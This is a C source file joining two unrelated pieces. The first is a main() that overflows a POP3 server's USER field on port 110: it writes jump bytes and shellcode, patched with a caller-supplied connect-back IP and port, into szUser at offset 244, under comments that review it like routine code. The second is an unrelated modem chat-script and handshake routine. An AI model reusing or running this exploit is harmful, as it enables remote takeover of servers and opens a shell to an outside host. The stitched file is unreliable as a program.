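/*
 * Program entry point.  Expects exactly three arguments: argv[1] is the host
 * handed to Connect() on port 110, argv[2] an IPv4 address and argv[3] a port
 * number; the latter two are XOR-masked and copied into Shellcode at
 * PORT_OFFSET / IP_OFFSET before szUser and szPass are sent with SlowSend().
 *
 * Changed here: `void main` and the bare `return;` are not valid for a hosted
 * C program (C11 5.1.2.2.1), so the function now returns int.  Nothing else in
 * the body was altered.
 *
 * Review notes for the maintainer (visible from this block alone):
 *  - help() is presumably noreturn; otherwise argv[1..3] are read even when
 *    argc != 4 — confirm.
 *  - atoi() reports no conversion error, so a non-numeric argv[3] silently
 *    becomes port 0; inet_addr() and Connect() results are likewise used
 *    without checking for failure.
 *  - szUser is written at fixed offsets from index 244 with no size visible
 *    here; its declaration must be large enough for that, and
 *    sizeof(Shellcode) - 1 assumes Shellcode is a string-literal array rather
 *    than a pointer — confirm.
 *  - Shellcode is patched in place, so this function is not re-entrant.
 */
int main(int argc, char *argv[])
{
    /*_asm{ mov eax,90909091h dec eax a: dec ebx cmp [ebx], eax jnz a push ebx ret }*/
    if (argc != 4)
        help(argv[0]);
    unsigned short port;
    unsigned long ip;
    port = htons(atoi(argv[3])) ^ (USHORT)0x9999;
    ip = inet_addr(argv[2]) ^ (ULONG)0x99999999;
    memcpy(&Shellcode[PORT_OFFSET], &port, 2);
    memcpy(&Shellcode[IP_OFFSET], &ip, 4);
    SOCKET s = Connect(argv[1], 110);
    tr(s);
    memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
    memcpy(szUser + 244 + 8, "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\xC3\x90\x90\x90\x90", 17);
    memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
    SlowSend(s, (char *)szUser, 1);
    getch();
    tr(s);
    SlowSend(s, (char *)szPass, 100);
    tr(s);
    Disconnect(s);
    return 0;
}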
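/*
 * Drive the modem through a "chat" script, then exchange a one-byte
 * handshake with the far end.
 *
 * parm: the script.  Text outside parentheses is sent one byte at a time
 *       with SlowSend() (each run is preceded by Wait( SEC(1)/5 )); text
 *       inside "(...)" is expected back from WaitByte(), and any mismatch
 *       restarts the comparison at the opening parenthesis.  Escapes:
 *       "\r" and "\n" on both sides; in the send part additionally "\`"
 *       (Wait( 1 )), "\~" (Wait( SEC(1) )), "\r" also pauses SEC(1)/2
 *       after sending, and any other "\x" sends x literally.
 * Returns NULL on success, otherwise one of the TRP_ERR_* strings:
 *   - TRP_ERR_invalid_modem_string if a backslash ends the script,
 *   - TRP_ERR_timeout_on_modem_string if an expected byte does not arrive
 *     within SEC(3) and then within a further SEC(60),
 *   - TRP_ERR_modem_failed_connection if EXPECT_CHAR is not seen within
 *     SEC(10) of sending SEND_CHAR (which of '=' / '-' plays which role
 *     depends on SERVER).
 * A script that is empty after leading blanks returns NULL without
 * sending anything.
 *
 * Fixes in this revision:
 *   - leading blanks were never skipped: the loop tested `== ' ' && == '\t'`,
 *     which no character satisfies; it now uses `||`.
 *   - when an expected byte timed out once, `--parm` stepped back only one
 *     character, so a "\r"/"\n" escape was retried as the literal letter;
 *     the retry now restarts at the beginning of the escape sequence.
 *   - script bytes are read as unsigned char, so a byte >= 0x80 compares
 *     equal to the same value from WaitByte() even where char is signed
 *     (assumes WaitByte() returns received bytes as 0..255 — confirm).
 * SEC() is presumably seconds expressed in the tick units WaitByte()/Wait()
 * take, and Wait( 1 ) one such tick — not visible here.
 */
static char *SetupModem( char *parm )
{
    char *start;        /* first char after '(' — restart point on mismatch */
    char *ch_start;     /* where the current expected char (or escape) begins */
    unsigned wait;
    unsigned ch;
    int data;

    Baud( MaxBaud );
    wait = SEC(3);
    while( *parm == ' ' || *parm == '\t' ) ++parm;
    if( *parm == '\0' ) return( NULL );
    for( ;; ) {
        if( *parm == '(' ) {
            /* expect part: match bytes from the line against "(...)" */
            start = ++parm;
            for( ;; ) {
                ch_start = parm;
                ch = (unsigned char)*parm;
                if( ch == '\0' ) goto done;     /* unterminated "(" ends the script */
                ++parm;
                if( ch == ')' ) break;
                if( ch == '\\' ) {
                    ch = (unsigned char)*parm++;
                    switch( ch ) {
                    case '\0': return( TRP_ERR_invalid_modem_string );
                    case 'r': ch = '\r'; break;
                    case 'n': ch = '\n'; break;
                    }
                }
                data = WaitByte( wait );
                if( data == SDATA_NO_DATA ) {
                    /* one long grace period, then give up */
                    if( wait != SEC(60) ) {
                        wait = SEC(60);
                    } else {
                        return( TRP_ERR_timeout_on_modem_string );
                    }
                    parm = ch_start;            /* retry the same expected char */
                } else {
                    wait = SEC(3);
                    if( data != ch ) parm = start;
                }
            }
        } else {
            /* send part: emit bytes up to the next '(' or end of script */
            Wait( SEC(1)/5 );
            for( ;; ) {
                ch = (unsigned char)*parm;
                if( ch == '\0' ) goto done;
                if( ch == '(' ) break;
                ++parm;
                if( ch == '\\' ) {
                    ch = (unsigned char)*parm++;
                    switch( ch ) {
                    case '\0': return( TRP_ERR_invalid_modem_string );
                    case '`': Wait( 1 ); break;
                    case '~': Wait( SEC(1) ); break;
                    case 'r': SlowSend( '\r' ); Wait( SEC(1)/2 ); break;
                    case 'n': SlowSend( '\n' ); break;
                    default: SlowSend( ch ); break;
                    }
                } else {
                    SlowSend( ch );
                }
            }
        }
    }
done:
#ifdef SERVER
#define SEND_CHAR '='
#define EXPECT_CHAR '-'
#else
#define SEND_CHAR '-'
#define EXPECT_CHAR '='
#endif
    /* handshake: look briefly for the peer's byte; if it is not already
       there, send ours and allow the peer SEC(10) to answer */
    wait = 1;
    for( ;; ) {
        data = WaitByte( wait );
        if( data == EXPECT_CHAR ) break;
        if( data == SDATA_NO_DATA ) {
            if( wait != SEC(10) ) {
                wait = SEC(10);
                SendByte( SEND_CHAR );
            } else {
                return( TRP_ERR_modem_failed_connection );
            }
        }
    }
    /* peer answered before we sent anything: send our byte now so it sees it */
    if( wait != SEC(10) ) SendByte( SEND_CHAR );
    return( NULL );
}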